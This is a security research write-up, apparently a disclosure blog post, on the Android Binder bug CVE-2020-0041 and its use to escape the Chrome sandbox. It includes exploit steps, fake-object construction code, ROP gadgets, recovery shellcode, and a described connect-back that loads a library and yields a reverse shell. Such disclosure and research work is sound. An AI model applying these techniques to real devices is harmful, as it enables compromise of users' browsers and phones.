Exploiting CVE-2020-0041 - Part 1: Escaping the Chrome Sandbox

A description of CVE-2020-0041, which we reported to Google in December 2019, and of the exploit we wrote with this bug to escape the Google Chrome sandbox.

A few months ago we discovered and exploited a bug in the Binder driver, which we reported to Google on December 10, 2019. The bug was included in the March 2020 Android Security Bulletin, with CVE-2020-0041.

In this post and the next we will describe the bug and the two exploits we wrote: a Chrome sandbox escape exploit that uses CVE-2020-0041 to compromise the Chrome browser process from within a compromised renderer, and a privilege escalation exploit that uses the same bug to compromise the kernel and escalate from a regular untrusted_app to root.

Root cause

The bug, along with some prerequisites on Binder internals, was already described by Jean-Baptiste Cayrou from Synacktiv in this post, published right after the Android Security Bulletin was made public. Since we find the explanation and accompanying graphics in that post very clear, we will limit ourselves to the necessary code details here and refer interested readers to it for further information.

The vulnerability was caused by a logic error when computing the number of offsets that have already been validated by the driver.

In particular, when the binder driver is processing a transaction it walks through a number of offsets and validates and translates binder objects at each such offset.

Objects of type BINDER_TYPE_PTR and BINDER_TYPE_FDA can have a parent object, which must be one of the already validated objects. To verify this, the driver uses the following code:

 

    case BINDER_TYPE_FDA: {
      struct binder_object ptr_object;
      binder_size_t parent_offset;
      struct binder_fd_array_object *fda =
        to_binder_fd_array_object(hdr);
[1]     size_t num_valid = (buffer_offset - off_start_offset) *
            sizeof(binder_size_t);
      struct binder_buffer_object *parent =
        binder_validate_ptr(target_proc, t->buffer,
                &ptr_object, fda->parent,
                off_start_offset,
                &parent_offset,
                num_valid);
      /* ... */

    } break;
    case BINDER_TYPE_PTR: {
      struct binder_buffer_object *bp =
        to_binder_buffer_object(hdr);
      size_t buf_left = sg_buf_end_offset - sg_buf_offset;
      size_t num_valid;

            /* ... */
[2]     if (binder_alloc_copy_user_to_buffer(
            &target_proc->alloc,
            t->buffer,
            sg_buf_offset,
            (const void __user *)
              (uintptr_t)bp->buffer,
            bp->length)) {
        binder_user_error("%d:%d got transaction with invalid offsets ptr\n",
              proc->pid, thread->pid);
        return_error_param = -EFAULT;
        return_error = BR_FAILED_REPLY;
        return_error_line = __LINE__;
        goto err_copy_data_failed;
      }

      /* Fixup buffer pointer to target proc address space */
      bp->buffer = (uintptr_t)
        t->buffer->user_data + sg_buf_offset;
      sg_buf_offset += ALIGN(bp->length, sizeof(u64));

[3]     num_valid = (buffer_offset - off_start_offset) *
          sizeof(binder_size_t);

      ret = binder_fixup_parent(t, thread, bp,
              off_start_offset,
              num_valid,
              last_fixup_obj_off,
              last_fixup_min_off);

The num_valid computations at [1] and [3] are incorrect, as the multiplication by sizeof(binder_size_t) should be a division instead. As a result of this error, an out-of-bounds offset can be provided as the parent of a PTR or FDA object.
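To make the size of the error concrete, the following sketch compares the buggy and the corrected computation in plain C. It is an illustration and not kernel code: binder_size_t is assumed to be 64 bits wide (as on a 64-bit kernel), and the two function names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* Assumption: binder_size_t is 64 bits wide, as on a 64-bit kernel. */
typedef uint64_t binder_size_t;

/* Buggy form from the snippet above: multiplies a byte distance by 8. */
size_t num_valid_buggy(size_t buffer_offset, size_t off_start_offset)
{
    return (buffer_offset - off_start_offset) * sizeof(binder_size_t);
}

/* Corrected form: converts the byte distance into a number of offsets. */
size_t num_valid_fixed(size_t buffer_offset, size_t off_start_offset)
{
    return (buffer_offset - off_start_offset) / sizeof(binder_size_t);
}
```

With three offsets already processed, buffer_offset - off_start_offset is 24 bytes. The corrected form yields 3, while the buggy form yields 192, so a parent index far beyond the end of the offset array passes the check.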

Interestingly, this error was made only in the sending path of a transaction; the same value is computed correctly in the cleanup code.

Causing transaction corruption

Even though an out-of-bounds object offset seems immediately interesting, parent objects are still validated by the binder_validate_ptr and/or binder_validate_fixup functions before they can be used. Therefore, it is not possible to directly provide a completely arbitrary object.

Instead, we make use of the fact that the offset array is followed by so-called extra buffers or sg_buf in the transaction buffer, and that these buffers are copied into when a BINDER_TYPE_PTR is encountered ([2] in the code snippet above).

Based on this, if we use an out-of-bounds offset BEFORE we have copied the corresponding sg_buf data in, the data will be uninitialized and taken from a previously executed transaction. However, if the out-of-bounds offset is used AFTER the copy of the corresponding sg_buf, the offset will be taken from the newly copied data.

This is exactly the same approach identified by Synacktiv, and you can find a very graphical description in their blog post and slides.

Our exploit then performs the following steps to trigger this situation:

  1. A fake BINDER_TYPE_PTR object is added to the transaction at a certain offset fake_offset.
  2. A legitimate BINDER_TYPE_PTR object is added at legit_offset.
  3. A BINDER_TYPE_PTR object is added, with its parent set to an out-of-bounds offset. We pre-initialize the out-of-bounds offset to the legit_offset value by sending an initial transaction.

    The driver now has a validated object with an out-of-bounds parent offset, which also means the out-of-bounds parent offset becomes implicitly trusted.
  4. A second BINDER_TYPE_PTR object is added with the same out-of-bounds parent offset. However, this time we also add a buffer into this object. The copy at [2] will then set the out-of-bounds offset to fake_offset.

    Since the out-of-bounds offset is implicitly trusted after processing the object in step 3, the driver now trusts the fake BINDER_TYPE_PTR.
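The effect of steps 3 and 4 can be reproduced with a toy model in userspace. The sketch below is not driver code: the structure, the sizes and the function names are all hypothetical, and the transaction buffer is reduced to an array of 64-bit words in which the offset array is directly followed by the sg_buf area.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define N_OFFSETS 4   /* offsets actually present in the transaction */
#define N_WORDS   16  /* offset array plus the sg_buf area behind it */

/* Toy transaction buffer: words below N_OFFSETS are real offset entries,
 * everything behind them models the sg_buf area. */
struct toy_txn {
    uint64_t words[N_WORDS];
};

/* Reads offset entry `index` the way the buggy check permits: the index is
 * not compared against N_OFFSETS, only against the size of the buffer. */
uint64_t toy_read_offset(const struct toy_txn *t, size_t index)
{
    return index < N_WORDS ? t->words[index] : UINT64_MAX;
}

/* Models the copy at [2]: user data lands in the sg_buf area only. */
void toy_copy_sg_buf(struct toy_txn *t, size_t word,
                     const uint64_t *src, size_t n)
{
    if (word >= N_OFFSETS && word <= N_WORDS && n <= N_WORDS - word)
        memcpy(&t->words[word], src, n * sizeof(uint64_t));
}
```

If word 6 still holds legit_offset from an earlier transaction, toy_read_offset(&t, 6) returns it, which corresponds to step 3. After toy_copy_sg_buf() writes fake_offset to the same word, the same read returns fake_offset, which corresponds to step 4.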

At this stage, the driver attempts to fix up the parent buffer with a pointer to the sg_buf data that has been copied in. This is done by binder_fixup_parent:

 

  parent = binder_validate_ptr(target_proc, b, &object, bp->parent,
             off_start_offset, &parent_offset,
             num_valid);
  if (!parent) {
    binder_user_error("%d:%d got transaction with invalid parent offset or type\n",
          proc->pid, thread->pid);
    return -EINVAL;
  }

  if (!binder_validate_fixup(target_proc, b, off_start_offset,
           parent_offset, bp->parent_offset,
           last_fixup_obj_off,
           last_fixup_min_off)) {
    binder_user_error("%d:%d got transaction with out-of-order buffer fixup\n",
          proc->pid, thread->pid);
    return -EINVAL;
  }

  if (parent->length < sizeof(binder_uintptr_t) ||
      bp->parent_offset > parent->length - sizeof(binder_uintptr_t)) {
    /* No space for a pointer here! */
    binder_user_error("%d:%d got transaction with invalid parent offset\n",
          proc->pid, thread->pid);
    return -EINVAL;
  }
[1] buffer_offset = bp->parent_offset +
      (uintptr_t)parent->buffer - (uintptr_t)b->user_data;
[2] binder_alloc_copy_to_buffer(&target_proc->alloc, b, buffer_offset,
            &bp->buffer, sizeof(bp->buffer));

last_fixup_obj_off here refers to the object validated in step 3, and because it's been validated its parent offset is also implicitly trusted. Therefore the binder_validate_fixup call succeeds.

However, the contents at parent_offset have been modified while processing the latter BINDER_TYPE_PTR object, and now point to a fake object with completely controlled contents (parent in the snippet above).

We can thus provide an arbitrary buffer_offset at [1], which is then used to copy the address of the sg_buf at [2].
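The arithmetic at [1] can be inverted to pick the buffer value of the fake parent. The following is a minimal sketch of that calculation with plain 64-bit integers; fake_parent_buffer_for is a hypothetical helper name, and the sketch ignores the additional length check on parent->length shown above.

```c
#include <stdint.h>

/* Mirrors the arithmetic at [1] in binder_fixup_parent. */
uint64_t fixup_write_offset(uint64_t parent_offset, uint64_t parent_buffer,
                            uint64_t user_data)
{
    return parent_offset + parent_buffer - user_data;
}

/* Hypothetical helper: the `buffer` value to place in the fake parent so
 * that the fixup pointer is written at `target_offset` in the transaction. */
uint64_t fake_parent_buffer_for(uint64_t target_offset, uint64_t parent_offset,
                                uint64_t user_data)
{
    return user_data + target_offset - parent_offset;
}
```

For example, with a made-up user_data of 0xe0000000 and a parent_offset of 8, a fake parent buffer of 0xe0000040 makes the driver write the sg_buf address at offset 0x48 of the transaction buffer.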

Note however that we require knowing the value of b->user_data in order for the copy to succeed. Even worse, in the code currently shipped with Pixel devices the following BUG_ON will trigger if it's incorrect, which will crash the kernel:

 
static void binder_alloc_do_buffer_copy(struct binder_alloc *alloc,
          bool to_buffer,
          struct binder_buffer *buffer,
          binder_size_t buffer_offset,
          void *ptr,
          size_t bytes)
{
  /* All copies must be 32-bit aligned and 32-bit size */
  BUG_ON(!check_buffer(alloc, buffer, buffer_offset, bytes));

b->user_data is the address, in the recipient's address space, of the binder buffer into which the transaction is being copied.
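To see why a wrong guess for b->user_data is fatal, consider a simplified userspace model of such a check. This sketch covers only bounds and 32-bit alignment, which is what the comment in the snippet above describes; it is not a copy of the kernel's check_buffer, which may verify more than this, and toy_check_buffer is a hypothetical name.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Simplified model: a copy of `bytes` at `offset` must lie inside a buffer
 * of `buffer_size` bytes and must start on a 32-bit boundary. */
bool toy_check_buffer(size_t buffer_size, uint64_t offset, size_t bytes)
{
    return buffer_size >= bytes &&
           offset <= buffer_size - bytes &&
           (offset % sizeof(uint32_t)) == 0;
}
```

If the guessed user_data is off by some amount, the computed buffer_offset is off by the same amount. Unless the result still happens to be an aligned offset inside the transaction buffer, the check fails and the BUG_ON fires.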

This value is trivial to learn if we are able to send a transaction to our own process, which is possible but requires using some tricks (we'll discuss one of those tricks in the coming posts). Additionally, in the case of the Chrome browser as currently released, this mapping is at the same address in the renderer and the browser process. Similarly, regular Android apps inherit from zygote or zygote64 and share a significant portion of their mappings.

Note also that instead of a BINDER_TYPE_PTR object we could use a BINDER_TYPE_FDA object in the last step. In that case, the driver would process an arbitrary part of the transaction as file descriptors, send them to the recipient and replace the file descriptor number.

This can also be used to corrupt arbitrary dwords, such as a validated object offset. This would allow injecting fully arbitrary objects into the transaction if required.

Available primitives

Using our memory corruption primitive we can overwrite parts of already validated binder transactions. Since these values are supposed to be read-only to anyone but the kernel, the rest of the system trusts them. There are two stages at which these values are used that we could target for our attack:

  1. When the corrupted transaction is received, it gets processed by the userspace components. This includes libbinder (or libhwbinder if using /dev/hwbinder) as well as upper layers.
  2. When userspace is done with the transaction buffer, it asks the driver to free it with the BC_FREE_BUFFER command. This results in the driver processing the corrupted transaction buffer.

In this post we'll focus on what can be done when we target the userspace components, and in follow up posts we'll discuss targeting the kernel cleanup code.

The code responsible for unmarshalling data and objects from a binder transaction can be found in Parcel.cpp within libbinder. The following piece of code is executed when an object is read from a transaction:

 
status_t unflatten_binder(const sp<ProcessState>& proc,
    const Parcel& in, sp<IBinder>* out)
{
    const flat_binder_object* flat = in.readObject(false);

    if (flat) {
        switch (flat->hdr.type) {
            case BINDER_TYPE_BINDER:
                *out = reinterpret_cast<IBinder*>(flat->cookie);
                return finish_unflatten_binder(nullptr, *flat, in);
    ...

From there we learn that if we corrupt the cookie field of a BINDER_TYPE_BINDER object, we end up controlling the IBinder pointer stored in the resulting sp<IBinder>.

In order to understand what can be reached from the Chrome sandbox, we can take a look at services that we can reach from either the service manager or handles we already have access to. For the former, we can take a look at the SELinux policy:

    allow isolated_app activity_service:service_manager find;
    allow isolated_app display_service:service_manager find;
    allow isolated_app webviewupdate_service:service_manager find;
    ...
    neverallow isolated_app {
    service_manager_type
        -activity_service
        -ashmem_device_service
        -display_service
        -webviewupdate_service
    }:service_manager find;

  

This means we can ask the service manager for handles to the Activity Manager, Display Service, WebView update service and Ashmem service. From what we could see, all these services run in 64-bit processes, while we are in a 32-bit process. Since we cannot predict the address of the binder mapping in those processes, it will be hard for us to even trigger the bug without hitting the BUG_ON check above unless we have an additional leak from these processes.

We thus turned to the binder handles already available to a regular Chrome renderer process. To identify them, we used the following piece of C code, which borrows utility functions from the AOSP service manager code:

/*
 * @bs must be a binder_state constructed from the already initialized binder fd in order 
 * to identify what interfaces are available to the renderer process.
 */
void check_available_interfaces(struct binder_state *bs) {
  char txn_data[0x1000];
  char reply_data[0x1000];
  struct binder_io msg;
  struct binder_io reply;

  /* Iterate for a maximum of 100 handles */
  for(int handle=1; handle <= 100; handle++) {
    bio_init(&msg, txn_data, sizeof(txn_data), 10);
    bio_init(&reply, reply_data, sizeof(reply_data), 10);

    /* Retrieve handle interface */
    int ret = binder_call(bs, &msg, &reply, handle, INTERFACE_TRANSACTION);

    /* Check against wanted interface */
    if (!ret) {
      size_t sz = 0;
      
      char string[1000] = {0};
      uint16_t *str16 = bio_get_string16(&reply, &sz);
      /* Skip replies without a usable interface descriptor */
      if (str16 != NULL && sz != 0 && sz < sizeof(string)-1) {
        /* Convert to regular string */
        for (uint32_t x=0 ; x < sz; x++)
            string[x] = (char)str16[x];

        __android_log_print(ANDROID_LOG_DEBUG, "PWN", "Interface for handle %d -> %s", handle, string);
      }
    }
  }
}

Injecting this code into the renderer process on an Android 10 system provides the following output:

    10-25 17:03:14.392  9764  9793 D PWN     : Interface for handle 1 -> android.app.IActivityManager
    10-25 17:03:14.392  9764  9793 D PWN     : Interface for handle 2 -> android.content.pm.IPackageManager
    10-25 17:03:14.392  9764  9793 D PWN     : Interface for handle 4 -> android.hardware.display.IDisplayManager
    10-25 17:03:14.393  9764  9793 D PWN     : Interface for handle 5 -> org.chromium.base.process_launcher.IParentProcess
    10-25 17:03:14.394  9764  9793 D PWN     : Interface for handle 6 -> android.ashmemd.IAshmemDeviceService
  

All these handles belong to 64-bit service processes, except for the IParentProcess which belongs to the Chrome browser. Luckily for us, this process is also running in 32-bit mode in current Chrome releases, and therefore we can target it. Taking a look at the interface definition is however somewhat depressing:

// Copyright 2018 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

package org.chromium.base.process_launcher;

interface IParentProcess {
    // Sends the child pid to the parent process. This will be called before any
    // third-party code is loaded, and will be a no-op after the first call.
    oneway void sendPid(int pid);

    // Tells the parent proces the child exited cleanly. Not oneway to ensure
    // the browser receives the message before child exits.
    void reportCleanExit();
}

None of these calls is very interesting for our purposes, since there are no objects being passed around. However, if we dig deeper into how Binder objects are implemented we can find a solution to our troubles in the BBinder class that all (or most?) objects extend from:

status_t BBinder::onTransact(
    uint32_t code, const Parcel& data, Parcel* reply, uint32_t /*flags*/)
{
    switch (code) {
        /* ... */
        case SHELL_COMMAND_TRANSACTION: {
            int in = data.readFileDescriptor();
            int out = data.readFileDescriptor();
            int err = data.readFileDescriptor();
            int argc = data.readInt32();
            Vector<String16> args;
            for (int i = 0; i < argc && data.dataAvail() > 0; i++) {
               args.add(data.readString16());
            }
            sp<IShellCallback> shellCallback = IShellCallback::asInterface(
                    data.readStrongBinder());
            sp<IResultReceiver> resultReceiver = IResultReceiver::asInterface(
                    data.readStrongBinder());

            // XXX can't add virtuals until binaries are updated.
            //return shellCommand(in, out, err, args, resultReceiver);
            (void)in;
            (void)out;
            (void)err;

            if (resultReceiver != nullptr) {
                resultReceiver->send(INVALID_OPERATION);
            }

            return NO_ERROR;
        }

        /* ... */
    }
}

Thus, in the code above the IResultReceiver object will point to controlled data if we have used the bug to overwrite the cookie field of the corresponding binder object. In order to do so reliably, the exploit performs the following steps:

  1. Find its own binder mapping and the open binder file descriptor. These are then used to figure out the maximum transaction size we can send to the browser process.
  2. Compute user_address as binder_mapping + MAPPING_SIZE - transaction_size. This is the address at which the received transaction buffer will start, assuming that the retrieved maximum transaction size corresponds to free space at the end of the binder mapping of the browser process.
  3. Send a transaction to pre-initialize an out-of-bounds value that will be used as an offset when we trigger the bug.
  4. Send a SHELL_COMMAND_TRANSACTION while triggering the bug. This requires adding a few objects to the transaction in order to reach the readStrongBinder calls:
    • Three file descriptor objects
    • An argument count of zero (so no strings need to be added)
    • A null binder as IShellCallback
    • The IParentProcess handle, which the driver will convert into a binder object. It is critical to provide a handle owned by the browser process here, since otherwise the driver will translate it into a handle instead of an actual object.
    • A fake PTR object, not added to the transaction, which will be used after triggering the bug.
    • A legitimate PTR object. The preinitialized offset from step 3 should match the offset of this object within the transaction buffer.
    • A second PTR object whose parent field is out of bounds, and points to the pre-initialized offset added above. We use a NULL buffer here, so that no copy is performed but that the out-of-bounds parent is taken as valid.
    • An additional PTR with the same parent but this time with a buffer. This buffer will replace the out-of-bounds offset, making it now point to the fake PTR object instead of the validated one. Additionally, the parent fixup code will now write a pointer to an arbitrary offset from the buffer start, which we use to modify the binder field of the IParentProcess node.
    • A final PTR with a new buffer. The buffer will be copied and its address will be written to the cookie field by the parent fixup code. This means the buffer we just sent will now be interpreted as an IResultReceiver object by the receiving code.
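The address computation from step 2 is a single expression. The sketch below spells it out with 32-bit addresses, matching the 32-bit renderer and browser processes; the function name is hypothetical, and the value of MAPPING_SIZE is passed in as a parameter because it is not given here.

```c
#include <stdint.h>

/* Step 2: where the received transaction is expected to start, assuming the
 * free space sits at the end of the target's binder mapping. */
uint32_t expected_user_address(uint32_t binder_mapping, uint32_t mapping_size,
                               uint32_t transaction_size)
{
    return binder_mapping + mapping_size - transaction_size;
}
```

With made-up values, a mapping at 0xc0000000 of size 0xfe000 and a maximum transaction size of 0x1000 give an expected user_address of 0xc00fd000.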

Note how we added additional objects to the transaction that are not actually parsed by the BBinder class shown above. However, this is not a problem since the libbinder code simply ignores additional objects that may be added to the transaction, as long as the required objects are present in the expected order.

Thus, with this setup we end up with a Binder object pointing to controlled data inside the Binder mapping itself.

From fake object to shellcode execution

The fake object is cast to an IResultReceiver object, which ends up causing a significant amount of code to be executed. The first thing we need to ensure is that the code can acquire a strong reference on the object.

In particular, a RefBase object is used for reference counting. The address of this object is extracted from the first dword of our buffer. Next, a pointer is obtained from the RefBase instance and the reference counts incremented:

int __fastcall android::RefBase::incStrong(android::RefBase *this, const void *a2)
{

  result = *((_DWORD *)this + 1);               // [1]
  v3 = (unsigned int *)(result + 4);
  do
    v4 = __ldrex(v3);
  while ( __strex(v4 + 1, v3) );
  do
    v5 = __ldrex((unsigned int *)result);
  while ( __strex(v5 + 1, (unsigned int *)result) );
  if ( v5 == 0x10000000 )
  {
    do
      v6 = __ldrex((unsigned int *)result);
    while ( __strex(v6 - 0x10000000, (unsigned int *)result) );
    result = (*(int (__fastcall **)(_DWORD))(**(_DWORD **)(result + 8) + 8))(*(_DWORD *)(result + 8)); // [2]
  }
  return result;
}

The pointer dereferenced at [1] must point to a writable address, and its contents must not be the special value 0x10000000 to avoid the call at [2].
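The reference counting logic in the decompiled listing can be modeled with C11 atomics. This is a sketch of the control flow only, not the libutils implementation: the structure and function names are hypothetical, the field layout is the one implied by the listing (strong count at offset 0, weak count at offset 4), and the virtual call at [2] is replaced by a boolean return value.

```c
#include <stdatomic.h>
#include <stdbool.h>

#define INITIAL_STRONG_VALUE 0x10000000

/* Layout implied by the decompiled code: strong count at +0, weak at +4. */
struct toy_refs {
    atomic_int strong;
    atomic_int weak;
};

/* Returns true if the real code would take the virtual call at [2]. */
bool toy_inc_strong(struct toy_refs *refs)
{
    atomic_fetch_add(&refs->weak, 1);
    int old = atomic_fetch_add(&refs->strong, 1);
    if (old != INITIAL_STRONG_VALUE)
        return false;
    /* First strong reference: remove the marker value again. */
    atomic_fetch_sub(&refs->strong, INITIAL_STRONG_VALUE);
    return true;
}
```

Both increments are writes, which is why the pointer must reference writable memory, and any previous strong count other than 0x10000000 skips the virtual call.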

The first part is problematic since our fake object is inside a binder mapping, which is always read-only for userland. In our exploit we set this pointer to a temporary buffer in the data segment of the libc. We can do this because we are already assuming that the target process mappings are very similar to our own, thus we can simply take our own libc address.

Once we get past this incStrong call, the code flows until the following indirect call:

int __fastcall android::javaObjectForIBinder(int a1, android **myobj)
{

  if ( !*myobj )
    return 0;
  if ( (*(int (__fastcall **)(android *, int *))(*(_DWORD *)*myobj + 32))(*myobj, &dword_153848) )
    return *((_DWORD *)*myobj + 4);

The value of *myobj here matches that of our fake object, so we end up calling a function pointer from our fake object and passing the fake object address as a first parameter. Thus, with the following code we obtain code execution:

  /* 
   * We use the address of the __sF symbol as temporary storage. From the source code,
   * this symbol appears to be unused in the current bionic library. 
   */

  uint32_t utmp = (uint32_t)dlsym(handle, "__sF");
  DO_LOG("[*] Temporary storage: %x\n", utmp);

  ...

  DO_LOG("[*] fake_object_addr: %x\n", fake_object_addr);

  uint64_t offset_ref_base = 0xd0;
  fake_object[0] = fake_object_addr + offset_ref_base*sizeof(uint32_t) + 12; 

  ...

  /*
   * This is a fake RefBase class, with a pointer to a writable area in libc.
   * We need this because our object is located in the binder mapping and cannot
   * be written to from usermode. 
   * 
   * The RefBase code will try to increment a refcount before we get control, so
   * pointing it to an empty buffer is fine. The only thing we need to take care of 
   * is preventing it from being the special `initial value` of strong ref counts,
   * because in this case the code will also do a virtual function call through this 
   * fake object.
   */

  fake_object[offset_ref_base] = (offset_ref_base + 1)*sizeof(uint32_t); /* This is used as an offset from the base object*/
  fake_object[offset_ref_base+1] = 0xdeadbeef;                           /* Unused */
  fake_object[offset_ref_base+2] = (uint32_t)utmp;                       /* Writable address in libc */


  /* Here comes the PC control. We point it to a stack pivot, and r0
   * points to the beginning of our object (i.e to &fake_object[0]).
   */

  fake_object[offset_ref_base +11] = gadgets[STACK_PIVOT].address;

 

utmp here is the address of a buffer in libc that appears to be unused, and that is part of a writable mapping. Since the address of libc is identical in the renderer process and the browser process, we can just resolve it in our own process. Similarly, we resolve all ROP gadgets in our own process.

Additionally, since the binder mapping address is also the same on both processes, we can use this to compute the address of our own data in the target process.

Since the fake object is also passed as the first parameter, we pivot the stack to R0 using an ldm r0!, {r2, r5, ip, sp, lr, pc} gadget and start a ROP chain from the beginning of the object. The final setup looks as follows:

However, the fact that the mapping is read-only makes it impossible to call any functions that use the stack. For that reason, our ROP chain performs the following steps:

  1. Use a gadget to save r7 into the utmp buffer. r7 contains a pointer to the stack when our ROP chain starts executing, so this allows us to set the stack back to a good value later on. We use the following gadget for this: str r7, [r0] ; mov r0, r4 ; add sp, #0xc ; pop {r4, r5, r6, r7, pc}.
  2. Use mmap to allocate RWX pages at a fixed address. We use the following code from the libc system call wrappers for that: svc 0 ; pop {r4-r7} ; cmn r0, #0x1000 ; bx lr.
  3. Use a few ROP gadgets to copy a first stage shellcode into RWX memory. In particular, we use str r1, [r0] ; mov r0, lr ; pop {r7, pc} to write r1 to the address pointed to by r0 after popping these registers from the stack.
  4. Pivot the stack to the RWX memory, call cacheflush on the copied shellcode and jump to it. We use a pop {lr, pc} gadget to prepare the return address for cacheflush, and a pop {r0, r1, ip, sp, pc} gadget to pivot the stack and call into cacheflush.

As soon as cacheflush returns we get shellcode execution and a proper read/write stack. In order to reduce the ROP chain size, we use a small initial shellcode that uses memcpy to copy the next stage into RWX memory, then calls cacheflush once again and finally jumps to it.

Now that we have unrestricted shellcode execution, we can execute any action required by our exploit and then fix up the Chrome process so that the user can continue browsing happily.

Process continuation

In order to achieve process continuation, our main shellcode connects back to 127.0.0.1:6666 and retrieves a shared library. The shared library is stored as /data/data/<package_name>/test.so and loaded using __loader_dlopen.

The __loader_dlopen symbol is currently resolved heuristically by the code injected into the renderer. This is required because the default dlopen prevents loading libraries from non-standard paths, so we follow a similar approach to that of Frida.

After loading the shared object, the shellcode restores the browser process state.

In order to do so, we use one of the higher stack frames that restores most registers from the stack. In particular, we use the copies of the registers stored by art_quick_invoke_stub in libart.so:

.text:0042F7AA                 POP.W           {R4-R11,PC}
.text:0042F7AE ; ---------------------------------------------------------------------------
.text:0042F7AE
.text:0042F7AE loc_42F7AE                              ; CODE XREF: art_quick_invoke_stub+106↑j
.text:0042F7AE                 BLX             __stack_chk_fail
.text:0042F7AE ; End of function art_quick_invoke_stub
.text:0042F7AE

The renderer code parses the ArtMethod::Invoke assembly code and finds the return address for the art_quick_invoke_stub call. Then the shellcode looks through the stack to find the corresponding stack frame and restore all registers before returning.

However, just returning there results in the Art VM crashing at different points later on.

In order to fix this, we analyzed the crashing locations. The crashes we observed were related to garbage collection and occurred within this code:

void Thread::HandleScopeVisitRoots(RootVisitor* visitor, pid_t thread_id) {
  BufferedRootVisitor<kDefaultBufferedRootCount> buffered_visitor(
      visitor, RootInfo(kRootNativeStack, thread_id));
  for (BaseHandleScope* cur = tlsPtr_.top_handle_scope; cur; cur = cur->GetLink()) {
    cur->VisitRoots(buffered_visitor);
  }
}

Or in assembly:

PUSH.W          {R4-R11,LR}
SUB.W           SP, SP, #0x418
SUB             SP, SP, #4
MOV             R5, R1
LDR             R1, =(__stack_chk_guard_ptr - 0x3AE4A6)
ADD             R1, PC  ; __stack_chk_guard_ptr
LDR.W           R10, [R1] ; __stack_chk_guard
LDR.W           R1, [R10]
LDR             R3, =(_ZTVN3art8RootInfoE - 0x3AE4B8) ; `vtable for'art::RootInfo
STR.W           R1, [SP,#0x440+var_28]
MOVS            R1, #4
ADD             R3, PC  ; `vtable for'art::RootInfo
STR             R1, [SP,#0x440+var_434]
ADD.W           R1, R3, #8
STR             R2, [SP,#0x440+var_430]
MOVS            R2, #0
STR.W           R2, [SP,#0x440+var_2C]
STRD.W          R5, R1, [SP,#0x440+var_43C]
LDR.W           R7, [R0,#0xDC]           ; [1]
CMP             R7, #0
BEQ             loc_3AE582

At [1] we see offset 0xDC from the Thread object is checked against null. At the point where we are returning, r6 points to the current Thread * object.

Therefore, our shellcode gets the current Thread * value from the restored registers and clears this field before continuing.

The final recovery part of the shellcode looks as follows:

return:
# Get and fix sp up. Point to stack frame containing r4-r11 and pc.
  ldr r3, smem
  ldr sp, [r3]
  ldr r3, retoff

search:
  # Load 'lr' if there 
  ldr r0, [sp, #0x20] 
  cmp r0, r3
  addne sp, sp, #4
  bne search

done: 
# Pop all registers
  pop {r4-r11, lr}

# Clear thread top_handle_scope
  mov r0, #0
  str r0, [r6, #0xdc]

  bx lr

With this, the browser process continues executing cleanly after our shared object has been loaded. The shared object can thus perform any additional actions such as launching a background thread or forking and launching a reverse shell.
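The search loop in the recovery shellcode above can be modeled in C as follows. This is a sketch for illustration: the function name is hypothetical, and unlike the assembly, which walks the stack without a limit, the model takes an explicit bound so that it can be tested safely.

```c
#include <stddef.h>
#include <stdint.h>

#define SAVED_REGS 8 /* r4-r11 precede the saved return address */

/* Returns the index of the first word of the matching frame, or -1 if the
 * return address is not found within n_words. */
ptrdiff_t find_invoke_stub_frame(const uint32_t *stack, size_t n_words,
                                 uint32_t ret_addr)
{
    for (size_t i = 0; i + SAVED_REGS < n_words; i++) {
        /* Same test as `ldr r0, [sp, #0x20]` followed by `cmp r0, r3`. */
        if (stack[i + SAVED_REGS] == ret_addr)
            return (ptrdiff_t)i;
    }
    return -1;
}
```

The returned index corresponds to the final value of sp in the assembly: the eight words starting there are restored into r4-r11, and the ninth word is the return address that was searched for.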

Demonstration video

The following video shows the process of compromising the Chrome browser on a vulnerable Pixel 3 with the February 2020 patch level. On the top-left you see a root shell on the target device, which we use to inject our exploit into a renderer process. On the bottom-left you see the output of our exploit through logcat.

On the right, you see a display of the target device, where we show the target setup and start Chrome. After having started Chrome, we inject the shellcode using the root shell and almost immediately receive a reverse shell on the top-right part of the screen.

As you can see, the shell is running in the context of the browser process, and has therefore escaped the sandbox.

Code and next steps

You can find the code for the exploit described in this post in the Blue Frost Security GitHub. We provide the code as a set of patches for Chromium 78.0.3904.62 for demonstration purposes only.

In the next post, we will discuss how to attack the processing performed by the kernel in order to achieve a privilege escalation to root using this very same bug.